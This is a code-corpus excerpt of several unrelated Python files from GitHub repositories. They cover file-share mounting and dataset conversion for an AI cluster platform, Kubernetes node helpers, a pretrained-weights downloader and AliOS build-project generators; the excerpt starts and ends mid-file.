shutil.rmtree(frame_dir)
os.remove(out_filename)
``` |
{
"source": "jinlmsft/Apulis-AI-Platform",
"score": 3
} |
#### File: storage/auto_share/auto_share.py
```python
import time
import os
from datetime import datetime
import yaml
import logging
import logging.config
import argparse
import textwrap
import socket
import subprocess
import re
import sys
import getpass
import copy
def istrue( config, arg, default=False):
if arg in config:
val = config[arg]
if isinstance( val, bool):
return val
elif isinstance( val, basestring):
return val.lower()[0] == 'y'
else:
return val
else:
return default
def tolist( server ):
if isinstance( server, basestring):
return [server]
else:
return server
def pipe_with_output( cmd1, cmd2, verbose=False ):
try:
# https://stackoverflow.com/questions/4814970/subprocess-check-output-doesnt-seem-to-exist-python-2-6-5
if verbose:
logging.debug ( "Pipe: %s | %s " % (cmd1, cmd2 ) )
p1 = subprocess.Popen( cmd1.split(), stdout=subprocess.PIPE, stderr=subprocess.PIPE )
p2 = subprocess.Popen( cmd2.split(), stdin=p1.stdout, stdout=subprocess.PIPE, stderr=subprocess.PIPE )
output = p2.communicate()[0]
if verbose:
logging.debug ( output )
except subprocess.CalledProcessError as e:
print "Exception " + str(e.returncode) + ", output: " + e.output.strip()
if verbose:
logging.debug ( "Exception: %s, output: %s" % (str(e.returncode), e.output.strip()) )
return ""
return output
def exec_with_output( cmd, verbose=False, max_run=30 ):
try:
# https://stackoverflow.com/questions/4814970/subprocess-check-output-doesnt-seem-to-exist-python-2-6-5
cmds = cmd.split()
if verbose:
logging.debug ( "Execute: %s" % cmd )
sp = subprocess.Popen( cmds, stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True )
output, err = sp.communicate()
count = 0
while sp.poll() == None and count < max_run:
time.sleep(1)
count += 1
if verbose:
logging.debug ( "Return: %d, Output: %s, Error: %s" % (sp.returncode, output, err) )
return (sp.returncode, output, err)
except subprocess.CalledProcessError as e:
print "Exception " + str(e.returncode) + ", output: " + e.output.strip()
if verbose:
logging.debug ( "Exception: %s, output: %s" % (str(e.returncode), e.output.strip()) )
return (e.returncode, e.output, "Error")
def exec_wo_output( cmd, verbose=False ):
try:
# https://stackoverflow.com/questions/4814970/subprocess-check-output-doesnt-seem-to-exist-python-2-6-5
if verbose:
logging.debug ( "Execute: %s" % cmd )
os.system( cmd )
except subprocess.CalledProcessError as e:
print "Exception " + str(e.returncode) + ", output: " + e.output.strip()
def mount_one_hdfs( v, physicalmountpoint, server, verbose=True):
exec_with_output( "hadoop-fuse-dfs hdfs://%s %s %s " % (server, physicalmountpoint, v["options"]), verbose=verbose )
def test_one_hdfs( server, verbose=True):
(retcode, output, err) = exec_with_output("hdfs dfs -test -e hdfs://%s" % server, verbose=verbose)
if err.find("not supported in state standby")>=0:
# standby namenode
logging.debug ( "HDFS namenode %s is standby namenode" % server )
return False
elif err.find("Connection refused")>=0:
logging.debug ( "HDFS namenode %s fails" % server )
return False
elif err.find("Incomplete HDFS URI")>=0:
logging.debug ( "Wrongly formatted namenode %s: fails" % server )
return False
else:
logging.debug ( "HDFS namenode %s is active" % server )
return True
# Mount HDFS, with support of high availablability
def mount_hdfs( v, physicalmountpoint, verbose=True ):
servers = tolist(v["server"])
if len(servers)==0:
# No HDFS server specified, unable to mount
return False
elif len(servers)==1:
mount_one_hdfs( v, physicalmountpoint, servers[0], verbose=verbose)
return True
else:
for server in servers:
if test_one_hdfs(server, verbose):
mount_one_hdfs( v, physicalmountpoint, server, verbose=verbose)
return True
from shutil import copyfile, copytree
from jinja2 import Environment, FileSystemLoader, Template
def render_template(template_file, target_file, config, verbose=False):
filename, file_extension = os.path.splitext(template_file)
basename = os.path.basename(template_file)
if ("render-exclude" in config and basename in config["render-exclude"] ):
# Don't render/copy the file.
return
if ("render-by-copy-ext" in config and file_extension in config["render-by-copy-ext"]) or ("render-by-copy" in config and basename in config["render-by-copy"]):
copyfile(template_file, target_file)
if verbose:
logging.debug ( "Copy tempalte " + template_file + " --> " + target_file )
elif ("render-by-line-ext" in config and file_extension in config["render-by-line-ext"]) or ("render-by-line" in config and basename in config["render-by-line"]):
if verbose:
logging.debug ( "Render tempalte " + template_file + " --> " + target_file + " Line by Line .... " )
ENV_local = Environment(loader=FileSystemLoader("/"))
with open(target_file, 'w') as f:
with open(template_file, 'r') as fr:
for line in fr:
logging.debug( "Read: " + line )
try:
template = ENV_local.Template(line)
content = template.render(cnf=config)
logging.debug( content )
f.write(content+"\n")
except:
pass
fr.close()
f.close()
else:
if verbose:
logging.debug( "Render tempalte " + template_file + " --> " + target_file )
try:
ENV_local = Environment(loader=FileSystemLoader("/"))
template = ENV_local.get_template(os.path.abspath(template_file))
content = template.render(cnf=config)
with open(target_file, 'w') as f:
f.write(content)
f.close()
except Exception as e:
logging.debug ( "!!! Failure !!! in render template " + template_file )
logging.debug( e )
pass
def mount_glusterfs( v, physicalmountpoint, verbose=True):
mount_file_basename = physicalmountpoint[1:].replace("/","-")
mount_file = os.path.join( "/etc/systemd/system", mount_file_basename + ".mount")
glusterfsconfig = copy.deepcopy(v)
glusterfsconfig["physicalmountpoint"] = physicalmountpoint
logging.debug( "Rendering ./glusterfs.mount --> %s" % mount_file )
render_template( "./glusterfs.mount", mount_file, glusterfsconfig, verbose=verbose )
def mount_fileshare(verbose=True):
with open("mounting.yaml", 'r') as datafile:
config = yaml.load(datafile)
datafile.close()
# print config
allmountpoints = config["mountpoints"]
nMounts = 0
for k,v in allmountpoints.iteritems():
if "curphysicalmountpoint" in v and istrue(v, "autoshare", True):
physicalmountpoint = v["curphysicalmountpoint"]
# gives mounted information only, would not write anything or carry out mount action
output = pipe_with_output("mount", "grep %s" % v["curphysicalmountpoint"], verbose=False)
umounts = []
existmounts = []
for line in output.splitlines():
words = line.split()
# pitfall: words[2] might be prefix of v["curphysicalmountpoint"], then a mount point would be missed
# so we should check whether they are equal, if so, we know the specified path on NFS node was previously mounted to infra/worker.
if len(words)>3 and words[1]=="on" and words[2] == v["curphysicalmountpoint"]:
if verbose:
logging.debug( "%s on %s" % (words[0], words[2]) )
# check if mount point exists, automatic create directory if non exist
bMount = False
for mountpoint in v["mountpoints"]:
try:
targetdir = os.path.join(physicalmountpoint, mountpoint)
if os.path.exists( targetdir ):
bMount = True
else:
try:
os.system("mkdir -m 0777 "+targetdir)
except:
logging.debug( "Failed to create directory " + targetdir )
if os.path.exists( targetdir ):
bMount = True
except:
logging.debug( "Failed to check for existence of directory " + targetdir )
if not bMount:
# Failing
umounts.append( words[2] )
else:
existmounts.append( words[2])
umounts.sort()
# Examine mount point, unmount those file shares that fails.
for um in umounts:
cmd = "umount -v %s" % um
logging.debug( "Mount fails, to examine mount %s " % um )
exec_with_output( cmd, verbose=verbose )
time.sleep(3)
if len(existmounts) <= 0:
nMounts += 1
if v["type"] == "azurefileshare":
exec_with_output( "mount -t cifs %s %s -o %s " % (v["url"], physicalmountpoint, v["options"] ), verbose=verbose )
elif v["type"] == "glusterfs":
mount_glusterfs( v, physicalmountpoint, verbose=verbose)
exec_with_output( "mount -t glusterfs -o %s %s:%s %s " % (v["options"], v["node"], v["filesharename"], physicalmountpoint ), verbose=verbose )
elif v["type"] == "nfs":
exec_with_output( "mount %s:%s %s -o %s " % (v["server"], v["filesharename"], physicalmountpoint, v["options"]), verbose=verbose )
elif v["type"] == "ceph":
exec_with_output( "%s" % (v["mountcmd"]), verbose=verbose)
elif v["type"] == "hdfs":
mount_hdfs( v, physicalmountpoint, verbose=verbose )
elif v["type"] == "local" or v["type"] == "localHDD":
exec_with_output( "mount %s %s " % ( v["device"], physicalmountpoint ), verbose=verbose )
elif v["type"] == "ceph":
exec_with_output( "%s" % (v["mountcmd"]), verbose=verbose)
else:
nMounts -= 1
if nMounts > 0:
time.sleep(1)
def link_fileshare():
with open("mounting.yaml", 'r') as datafile:
config = yaml.load(datafile)
datafile.close()
# print config
allmountpoints = config["mountpoints"]
(retcode, output, err) = exec_with_output("sudo mount")
for k,v in allmountpoints.iteritems():
if "mountpoints" in v and v["type"]!="emptyDir":
if output.find(v["curphysicalmountpoint"]) < 0:
logging.debug("!!!Warning!!! %s has not been mounted at %s " % (k, v["curphysicalmountpoint"]))
logging.debug(output)
else:
for basename in v["mountpoints"]:
dirname = os.path.join(v["curphysicalmountpoint"], basename )
exec_wo_output("sudo mkdir -p %s; " % dirname)
exec_wo_output("sudo chmod ugo+rwx %s; " % dirname)
for basename in v["mountpoints"]:
dirname = os.path.join(v["curphysicalmountpoint"], basename )
storage_mount_path = config["storage-mount-path"]
if ("vc" in v) and (v["vc"] != ""):
storage_mount_path = os.path.join(config["dltsdata-storage-mount-path"], v["vc"])
exec_wo_output("sudo mkdir -p %s; " % storage_mount_path)
linkdir = os.path.join(storage_mount_path, basename)
exec_wo_output("if [ ! -e %s ]; then sudo ln -s %s %s; fi; " % (linkdir, dirname, linkdir))
def start_logging( logdir = '/var/log/auto_share' ):
if not os.path.exists( logdir ):
os.system("mkdir -p " + logdir )
with open('logging.yaml') as f:
logging_config = yaml.load(f)
f.close()
# print logging_config
logging.config.dictConfig(logging_config)
logging.debug (".................... Start auto_share at %s .......................... " % datetime.now() )
logging.debug ( "Argument : %s" % sys.argv )
if __name__ == '__main__':
parser = argparse.ArgumentParser( prog='auto_share.py',
formatter_class=argparse.RawDescriptionHelpFormatter,
description=textwrap.dedent('''\
Automatically monitor and mount file share.
''') )
parser.add_argument('nargs', nargs=argparse.REMAINDER,
help="Additional command argument",
)
dir_path = os.path.dirname(os.path.realpath(__file__))
os.chdir(dir_path)
args = parser.parse_args()
start_logging()
logging.debug( "Run as user %s" % getpass.getuser() )
try:
mount_fileshare()
link_fileshare()
except:
logging.debug( "Exception when mounting files... " )
else:
logging.debug( "Examined all mounting points... " )
logging.debug( "End auto_share ... " )
```
#### File: src/ClusterManager/dataset_convert.py
```python
import json
import os
import time
import argparse
import uuid
import subprocess
import sys
import datetime
reload(sys)
sys.setdefaultencoding('utf8')
import yaml
from jinja2 import Environment, FileSystemLoader, Template
import base64
import re
import thread
import threading
import random
import shutil
import textwrap
import logging
import logging.config
from pycocotools import mask
from multiprocessing import Process, Manager
sys.path.append(os.path.join(os.path.dirname(os.path.abspath(__file__)),"../storage"))
sys.path.append(os.path.join(os.path.dirname(os.path.abspath(__file__)),"../utils"))
from jobs_tensorboard import GenTensorboardMeta
import k8sUtils
from config import config
from DataHandler import DataHandler
from cluster_manager import setup_exporter_thread, manager_iteration_histogram, register_stack_trace_dump, update_file_modification_time
logger = logging.getLogger(__name__)
def PolygonArea(corners):
n = len(corners) # of corners
area = 0.0
for i in range(n):
j = (i + 1) % n
area += corners[i][0] * corners[j][1]
area -= corners[j][0] * corners[i][1]
area = abs(area) / 2.0
return area
def segmentationToCorner(segmentation):
tmp = []
for i in range(0,len(segmentation),2):
tmp.append([segmentation[i],segmentation[i+1]])
return tmp
def create_log(logdir = '/var/log/dlworkspace'):
if not os.path.exists(logdir):
os.system("mkdir -p " + logdir)
with open('logging.yaml') as f:
logging_config = yaml.load(f)
f.close()
logging_config["handlers"]["file"]["filename"] = logdir+"/dataconvert.log"
logging.config.dictConfig(logging_config)
def insert_status_to_dataset(datasetId,projectId,status,out_path=None):
dataset_info_path = os.path.join(config["data_platform_path"],"private/account/%s/membership.json" % (projectId))
with open(dataset_info_path,"r") as f:
infos = json.loads(f.read())
if "dataSets" in infos:
if datasetId in infos["dataSets"]:
one_info = infos["dataSets"][datasetId]
if "convertStatus" in one_info:
logging.info("dataset: %s %s update status again!" % (projectId,datasetId))
one_info["convertStatus"] = status
one_info["convertOutPath"] = out_path
with open(dataset_info_path,"w") as f:
f.write(json.dumps(infos,indent=4, separators=(',', ':')))
def mkdirs(path):
if not os.path.exists(path):
os.makedirs(path)
index = 0
def merge_json_to_coco_dataset(list_ppath,json_path,coco_file_path,prefix="",args=None,category_path=None):
coco = {}
coco["images"] = []
coco["categories"] = []
coco["annotations"] = []
with open(os.path.join(list_ppath, "list.json"), "r") as f:
data = json.load(f)
ImgIDs = data.get("ImgIDs",[])
suffixs = data.get("suffixs",[])
categories = {}
categories_total = None
if os.path.exists(category_path):
with open(category_path, "r") as f2:
categories_total = json.load(f2)["categories"]
for index,ImgID in enumerate(ImgIDs):
new_image_id = ImgID
anno_path = os.path.join(json_path, 'images', "{}.json".format(ImgID))
if not os.path.exists(anno_path):
# compatible with image.suffix.json
new_anno_path = os.path.join(json_path, 'images', "{}{}.json".format(ImgID,suffixs[index]))
if os.path.exists(new_anno_path):
anno_path = new_anno_path
else:
continue
with open(anno_path, "r") as f:
json_dict = json.load(f)
json_dict["images"][0]["file_name"] = "{}.jpg".format(new_image_id)
json_dict["images"][0]["id"] = new_image_id
if json_dict.get("categories"):
categories_total = json_dict.get("categories")
for i in json_dict["annotations"]:
i["image_id"] = new_image_id
global index
i["id"] = index
index += 1
if i["category_id"] not in categories:
categories[i["category_id"]] = {"id":i["category_id"],"name":i["category_id"],"supercategory":i["category_id"]}
if "category_name" in i:
categories[i["category_id"]]["name"] = i["category_name"]
if "supercategory" in i:
categories[i["category_id"]]["supercategory"] = i["supercategory"]
if categories_total:
categories[i["category_id"]]["name"] = categories_total[i["category_id"]-1]["name"]
categories[i["category_id"]]["supercategory"] = categories_total[i["category_id"]-1]["supercategory"]
if "area" not in i:
if i["segmentation"]:
i["area"] = int(PolygonArea(segmentationToCorner((i["segmentation"][0]))))
if i["bbox"]:
i["area"] = i["bbox"][2] * i["bbox"][3]
if "iscrowd" not in i:
i["iscrowd"] = 0
coco["images"].extend(json_dict["images"])
coco["annotations"].extend(json_dict["annotations"])
# source_path = os.path.join(json_path, 'images', "{}.jpg".format(ImgID))
# if args and not args.ignore_image:
# shutil.copyfile(source_path, os.path.join(coco_image_path, "{}.jpg".format(new_image_id)))
coco["categories"] = list(map(lambda x:x[1],sorted([[k,v] for k,v in categories.items()],key=lambda x:x[0])))
with open(coco_file_path, "w") as f:
f.write(json.dumps(coco, indent=4, separators=(',', ':')))
with open(os.path.join(os.path.dirname(coco_file_path),"class_names.json"), "w") as f:
f.write(json.dumps(coco["categories"], indent=4, separators=(',', ':')))
def judge_datasets_is_private(projectId,datasetId):
ret = False
path = os.path.join(config["data_platform_path"], "private/account/%s/membership.json" % (projectId))
if os.path.exists(path):
with open(path, "r") as f:
infos = json.loads(f.read())
ret = infos["dataSets"][datasetId]["isPrivate"]
return ret
def find_dataset_creator(projectId):
path = os.path.join(config["data_platform_path"], "private/account/index.json")
with open(path, "r") as f:
infos = json.loads(f.read())
creator = infos[projectId]["creator"]
return creator
def find_dataset_bind_path(projectId,datasetId,isPrivate=False):
path = os.path.join(config["data_platform_path"], "private/account/%s/membership.json" % (projectId))
with open(path, "r") as f:
infos = json.loads(f.read())
ret = infos["dataSets"][datasetId]["dataSetPath"]
# return re.sub("^/data", "/dlwsdata/storage",ret) if not isPrivate else re.sub("^/home", "/dlwsdata/work",ret)
return ret
def DoDataConvert():
dataHandler = DataHandler()
jobs = dataHandler.getConvertList(targetStatus="queued")
for oneJob in jobs:
if oneJob["type"] == "image" and oneJob["targetFormat"]=="coco":
try:
list_path = os.path.join(config["data_platform_path"], "public/tasks/%s" % (oneJob["datasetId"]))
json_path = os.path.join(config["data_platform_path"], "private/tasks/%s/%s" % (oneJob["datasetId"], oneJob["projectId"]))
category_path = os.path.join(config["data_platform_path"], "private/tasks/%s/%s/category.json" % (oneJob["datasetId"],oneJob["projectId"]))
if judge_datasets_is_private(oneJob["projectId"],oneJob["datasetId"]):
username =find_dataset_creator(oneJob["projectId"])
coco_base_path = os.path.join(config["storage-mount-path"], "work/%s/data_platform/%s/%s/format_coco" % (username,oneJob["projectId"],oneJob["datasetId"]))
coco_file_path = os.path.join(coco_base_path, "annotations/instance.json")
show_coco_file_path = "/home/%s/data_platform/%s/%s" % (username,oneJob["projectId"],oneJob["datasetId"])
mkdirs(os.path.dirname(coco_file_path))
os.system("ln -s %s %s" %(find_dataset_bind_path(oneJob["projectId"],oneJob["datasetId"],isPrivate=True),os.path.join(coco_base_path,"images")))
else:
coco_base_path = os.path.join(config["storage-mount-path"],"storage/data_platform/%s/%s/format_coco" % (oneJob["projectId"],oneJob["datasetId"]))
coco_file_path = os.path.join(coco_base_path,"annotations/instance.json")
show_coco_file_path = "/data/data_platform/%s/%s" % (oneJob["projectId"],oneJob["datasetId"])
mkdirs(os.path.dirname(coco_file_path))
os.system("ln -s %s %s" % (find_dataset_bind_path(oneJob["projectId"],oneJob["datasetId"]), os.path.join(coco_base_path,"images")))
logging.info("=============start convert to format %s" % (oneJob["targetFormat"]))
merge_json_to_coco_dataset(list_path,json_path,coco_file_path,category_path=category_path)
dataHandler.updateConvertStatus("finished",oneJob["id"],coco_file_path)
insert_status_to_dataset(oneJob["datasetId"], oneJob["projectId"],"finished",show_coco_file_path)
logging.info("=============convert to format %s done" % (oneJob["targetFormat"]))
except Exception as e:
logging.exception(e)
dataHandler.updateConvertStatus("error", oneJob["id"],e)
insert_status_to_dataset(oneJob["datasetId"], oneJob["projectId"],"error")
def Run():
register_stack_trace_dump()
create_log()
logger.info("start to DoDataConvert...")
while True:
update_file_modification_time("DataConvert")
with manager_iteration_histogram.labels("data_convert").time():
try:
DoDataConvert()
except Exception as e:
logger.exception("do dataConvert failed")
time.sleep(1)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument("--port", "-p", help="port of exporter", type=int, default=9209)
args = parser.parse_args()
setup_exporter_thread(args.port)
Run()
```
#### File: RepairManager/utils/k8s_util.py
```python
import subprocess
import logging
from kubernetes import client, config
kubernetes_config_file = '/etc/kubernetes/restapi-kubeconfig.yaml'
def cordon_node(node_name, dry_run=True):
args = ['kubectl', 'cordon', node_name]
if dry_run:
args.append('--dry-run')
try:
output = subprocess.check_output(args, stderr=subprocess.STDOUT)
logging.info(output.decode())
return output.decode()
except subprocess.CalledProcessError as e:
logging.exception(f'Exception attempting to cordon node {node_name}')
return e.output.decode()
def is_node_cordoned(node_info, node_name):
for node in node_info.items:
for address in node.status.addresses:
if address.type == 'Hostname' and address.address == node_name:
return node.spec.unschedulable
logging.warning(f"Could not find node with hostname {node_name}")
def list_node():
config.load_kube_config()
api_instance = client.CoreV1Api()
return api_instance.list_node()
def list_pod_for_all_namespaces():
config.load_kube_config()
api_instance = client.CoreV1Api()
return api_instance.list_pod_for_all_namespaces()
def list_namespaced_pod(namespace):
config.load_kube_config(config_file=kubernetes_config_file)
api_instance = client.CoreV1Api()
return api_instance.list_namespaced_pod(namespace)
def get_job_info_from_nodes(nodes, portal_url, cluster_name):
pods = list_namespaced_pod("default")
jobs = {}
for pod in pods.items:
if pod.metadata and pod.metadata.labels:
if 'jobId' in pod.metadata.labels and 'userName' in pod.metadata.labels:
if pod.spec.node_name in nodes:
job_id = pod.metadata.labels['jobId']
user_name = pod.metadata.labels['userName']
node_name = pod.spec.node_name
vc_name = pod.metadata.labels['vcName']
if job_id not in jobs:
jobs[job_id] = {
'user_name': user_name,
'node_names': {node_name},
'vc_name': vc_name,
'job_link': f'https://{portal_url}/job/{vc_name}/{cluster_name}/{job_id}'}
else:
jobs[job_id]['node_names'].add(node_name)
return jobs
def get_node_address_info():
# map InternalIP to Hostname
node_info = list_node()
address_map = {}
if node_info:
for node in node_info.items:
internal_ip = None
hostname = None
for address in node.status.addresses:
if address.type == 'InternalIP':
internal_ip = address.address
if address.type == 'Hostname':
hostname = address.address
address_map[internal_ip] = hostname
logging.debug(f'node address map: {address_map}')
return address_map
``` |
{
"source": "jinlmsft/Detectron.pytorch",
"score": 2
} |
#### File: Detectron.pytorch/tools/download_imagenet_weights.py
```python
import argparse
import os
import requests
#from argparse_color_formatter import ColorHelpFormatter
#from colorama import init, Fore
import _init_paths # pylint: disable=unused-import
from core.config import cfg
def parse_args():
"""Parser command line argumnets"""
parser = argparse.ArgumentParser() #(formatter_class=ColorHelpFormatter)
parser.add_argument('--output_dir', help='Directory to save downloaded weight files',
default=os.path.join(cfg.DATA_DIR, 'pretrained_model'))
parser.add_argument('-t', '--targets', nargs='+', metavar='file_name',
help='Files to download. Allowed values are: ',
choices=list(PRETRAINED_WEIGHTS.keys()),
default=list(PRETRAINED_WEIGHTS.keys()))
return parser.parse_args()
# ---------------------------------------------------------------------------- #
# Mapping from filename to google drive file_id
# ---------------------------------------------------------------------------- #
PRETRAINED_WEIGHTS = {
'resnet50_caffe.pth': '1wHSvusQ1CiEMc5Nx5R8adqoHQjIDWXl1',
'resnet101_caffe.pth': '1x2fTMqLrn63EMW0VuK4GEa2eQKzvJ_7l',
'resnet152_caffe.pth': '1NSCycOb7pU0KzluH326zmyMFUU55JslF',
'vgg16_caffe.pth': '19UphT53C0Ua9JAtICnw84PPTa3sZZ_9k',
}
# ---------------------------------------------------------------------------- #
# Helper fucntions for download file from google drive
# ---------------------------------------------------------------------------- #
def download_file_from_google_drive(id, destination):
URL = "https://docs.google.com/uc?export=download"
session = requests.Session()
response = session.get(URL, params={'id': id}, stream=True)
token = get_confirm_token(response)
if token:
params = {'id': id, 'confirm': token}
response = session.get(URL, params=params, stream=True)
save_response_content(response, destination)
def get_confirm_token(response):
for key, value in response.cookies.items():
if key.startswith('download_warning'):
return value
return None
def save_response_content(response, destination):
CHUNK_SIZE = 32768
with open(destination, "wb") as f:
for chunk in response.iter_content(CHUNK_SIZE):
if chunk: # filter out keep-alive new chunks
f.write(chunk)
def main():
args = parse_args()
for filename in args.targets:
file_id = PRETRAINED_WEIGHTS[filename]
if not os.path.exists(args.output_dir):
os.makedirs(args.output_dir)
destination = os.path.join(args.output_dir, filename)
download_file_from_google_drive(file_id, destination)
print('Download {} to {}'.format(filename, destination))
if __name__ == "__main__":
main()
``` |
{
"source": "jinlongliu/AliOS-Things",
"score": 3
} |
#### File: AliOS-Things/build/fileformat.py
```python
import os, sys, re, platform
def list_files(dir_path):
file_list = [];
for root, dirs, files in os.walk(dir_path):
for f in files:
if (os.path.splitext(f)[1] == ".h" or os.path.splitext(f)[1] == ".c" or os.path.splitext(f)[1] == ".mk"):
file_list.append(os.path.join(root, f))
return file_list
def main():
if len(sys.argv) != 2:
print "Dir args is empty, Enter the path to be processed!"
os._exit(0)
filedir = sys.argv[1]
print filedir.strip()
sys_version = platform.version()
if "Ubuntu" in sys_version:
os.environ['syscmd'] = str("fromdos")
elif "CentOS" in sys_version:
os.environ['syscmd'] = str("dos2unix")
else:
print "Not find the system version!"
os._exit(0)
file_list = list_files(filedir)
for f in file_list:
os.environ['file'] = str(f)
os.system('$syscmd $file')
if __name__ == '__main__':
main()
```
#### File: build/scripts/keil.py
```python
import os
import sys
import string
import xml.etree.ElementTree as etree
import config_mk
from xml.etree.ElementTree import SubElement
from xml_format import gen_indent
from config_mk import Projects
def file_type_value(fn):
if fn.endswith('.h'):
return 5
if fn.endswith('.s') or fn.endswith('.S'):
return 2
if fn.endswith('.lib') or fn.endswith('.a'):
return 4
if fn.endswith('.cpp') or fn.endswith('.cxx'):
return 8
if fn.endswith('.c') or fn.endswith('.C'):
return 1
return 5
#ProjectFiles use for remove same name files
#add files
def add_group(parent, name, files, project_path):
cur_encoding = sys.getfilesystemencoding()
group = SubElement(parent, 'Group')
group_name = SubElement(group, 'GroupName')
group_name.text = name
for f in files:
files = SubElement(group, 'Files')
file = SubElement(files, 'File')
file_name = SubElement(file, 'FileName')
name = os.path.basename(f)
file_name.text = name.decode(cur_encoding)
file_type = SubElement(file, 'FileType')
file_type.text = '%d' % file_type_value(name)
file_path = SubElement(file, 'FilePath')
file_path.text = (aos_relative_path + f).decode(cur_encoding)
return group
# automation to do
def changeItemForMcu( tree ):
Path_TargetArmAds = 'Targets/Target/TargetOption/TargetArmAds/'
ScatterFile = tree.find(Path_TargetArmAds + 'LDads/ScatterFile')
IRAM1Size = tree.find(Path_TargetArmAds + 'ArmAdsMisc/OnChipMemories/OCR_RVCT9/Size')
IRAM2Size = tree.find(Path_TargetArmAds + 'ArmAdsMisc/OnChipMemories/OCR_RVCT10/Size')
FlashSize = tree.find(Path_TargetArmAds + 'ArmAdsMisc/OnChipMemories/OCR_RVCT4/Size')
if 'starterkit' in buildstring:
ScatterFile.text = '..\..\..\..\platform\mcu\stm32l4xx\src\STM32L433RC-Nucleo\STM32L433.sct'
if 'stm32l432' in buildstring:
ScatterFile.text = '..\..\..\..\platform\mcu\stm32l4xx\src\STM32L432KC-Nucleo\STM32L432.sct'
if 'stm32l053' in buildstring:
ScatterFile.text = '..\..\..\..\\board\stm32l053r8-nucleo\STM32L053.sct'
IRAM1Size.text='0x2000'
IRAM2Size.text=''
FlashSize.text='0x10000'
if 'stm32l031' in buildstring:
ScatterFile.text = '..\..\..\..\\board\stm32l031k6-nucleo\STM32L031.sct'
IRAM1Size.text='0x2000'
IRAM2Size.text=''
FlashSize.text='0x8000'
# change key word in project file. automation to do
def ModifyProjString( projString ):
if 'starterkit' in buildstring:
projString = projString.replace('STM32L475VGTx','STM32L433RCTx')
if 'stm32l432' in buildstring:
projString = projString.replace('STM32L475VGTx','STM32L432KCTx')
if 'stm32l053' in buildstring:
projString = projString.replace('STM32L475VGTx','STM32L053R8Tx')
projString = projString.replace('STM32L4xx_1024','STM32L0xx_64')
projString = projString.replace('STM32L4xx','STM32L0xx')
projString = projString.replace('stm32l4xx','stm32l0xx')
projString = projString.replace('STM32L4x5', 'STM32L053x')
projString = projString.replace('IRAM(0x20000000,0x00018000) IRAM2(0x10000000,0x00008000) IROM(0x08000000,0x00100000) \
CPUTYPE("Cortex-M4") FPU2 CLOCK(12000000) ELITTLE', 'IRAM(0x20000000-0x20001FFF) IROM(0x8000000-0x800FFFF) CLOCK(8000000) \
CPUTYPE("Cortex-M0+")')
projString = projString.replace('DCM.DLL','DARMCM1.DLL')
projString = projString.replace('-MPU','')
projString = projString.replace('-pCM4','-pCM0+')
projString = projString.replace('TCM.DLL','TARMCM1.DLL')
if 'stm32l031' in buildstring:
projString = projString.replace('STM32L475VGTx','STM32L031K6Tx')
projString = projString.replace('STM32L4xx_1024','STM32L0xx_32')
projString = projString.replace('STM32L4xx','STM32L0xx')
projString = projString.replace('stm32l4xx','stm32l0xx')
projString = projString.replace('STM32L4x5', 'STM32L031x')
projString = projString.replace('IRAM(0x20000000,0x00018000) IRAM2(0x10000000,0x00008000) IROM(0x08000000,0x00100000) \
CPUTYPE("Cortex-M4") FPU2 CLOCK(12000000) ELITTLE', 'IRAM(0x20000000-0x20001FFF) IROM(0x8000000-0x8007FFF) CLOCK(8000000) \
CPUTYPE("Cortex-M0+")')
projString = projString.replace('DCM.DLL','DARMCM1.DLL')
projString = projString.replace('-MPU','')
projString = projString.replace('-pCM4','-pCM0+')
projString = projString.replace('TCM.DLL','TARMCM1.DLL')
return projString
def gen_project(tree, target, script):
project_path = os.path.dirname(os.path.abspath(target))
root = tree.getroot()
out = file(target, 'wb')
out.write('<?xml version="1.0" encoding="UTF-8" standalone="no" ?>\n')
#change target name
TargetName = tree.find('Targets/Target/TargetName')
TargetName.text = buildstring
OutputName = tree.find('Targets/Target/TargetOption/TargetCommonOption/OutputName')
OutputName.text = buildstring
# add group
groups = tree.find('Targets/Target/Groups')
if groups is None:
groups = SubElement(tree.find('Targets/Target'), 'Groups')
groups.clear() # clean old groups
for group in script:
# don't add an empty group
if len(group['src']) != 0:
group_tree = add_group(groups, group['name'], group['src'], project_path)
# add GroupOption
GroupOption = SubElement(group_tree, 'GroupOption')
GroupArmAds = SubElement(GroupOption, 'GroupArmAds')
Cads = SubElement(GroupArmAds, 'Cads')
VariousControls = SubElement(Cads, 'VariousControls')
MiscControls = SubElement(VariousControls, 'MiscControls')
MiscControls.text = '--via '+opt_dir+group['name']+'.c_opts'
Aads = SubElement(GroupArmAds, 'Aads')
VariousControls = SubElement(Aads, 'VariousControls')
MiscControls = SubElement(VariousControls, 'MiscControls')
MiscControls.text = '--via '+opt_dir+group['name']+'.as_opts'
# set <OutputName>B-L475E-IOT01</OutputName>
gen_indent(root)
changeItemForMcu(tree)
projString = ModifyProjString( etree.tostring(root, encoding='utf-8') )
out.write(projString)
out.close()
def gen_main(target, script):
template_tree = etree.parse('build/scripts/template.uvprojx')
# create uvprojx file
gen_project(template_tree, target, script)
# create uvoptx file
opt_file = target.replace('.uvprojx', '.uvoptx')
opt_tree = etree.parse('build/scripts/template.uvoptx')
TargetName = opt_tree.find('Target/TargetName')
TargetName.text = buildstring
out = file(opt_file, 'wb')
projString = ModifyProjString( etree.tostring(opt_tree.getroot(), encoding='utf-8') )
out.write(projString)
out.close()
'''
Projects = [
{'name':'alicrypto',
'src':[
'a.c',
'a_1.s',
]
},
{'name':'alinkapp',
'src':[
'./app/example/alinkapp/alink_sample.c',
]
}
]
'''
#argv[1]: buildstring, eg: nano@b_l475e
buildstring = sys.argv[1]
proj_output_dir = 'projects/autogen/'+buildstring+'/keil_project'
#use in xml text
aos_relative_path = '../../../../'
projectPath = proj_output_dir+'/'+buildstring+'.uvprojx'
opt_dir = 'opts/'
print 'Making keil project '+buildstring
gen_main(projectPath, Projects)
print 'keil project: '+ projectPath + ' has generated over'
```
#### File: build/site_scons/scons_util.py
```python
import os, sys, json
import platform
import re
def log(msg):
sys.stdout.write(msg)
sys.stdout.flush()
def info(msg):
log("[INFO]: %s\n" % msg)
def error(msg, code=-1):
sys.stderr.write("[ERROR]: %s\n" % msg)
sys.exit(code)
def get_host_os():
host_os = platform.system()
if host_os == 'Windows':
host_os = 'Win32'
elif host_os == 'Linux':
if platform.machine().endswith('64'):
bit = '64'
else:
bit = '32'
host_os += bit
elif host_os == 'Darwin':
host_os = 'OSX'
else:
host_os = None
return host_os
def read_json(json_file):
""" Read data from json file """
data = None
if os.path.isfile(json_file):
with open(json_file, 'r') as f:
data = json.load(f)
else:
error("Can not find file: %s" % json_file)
return data
def get_config_value(keyword):
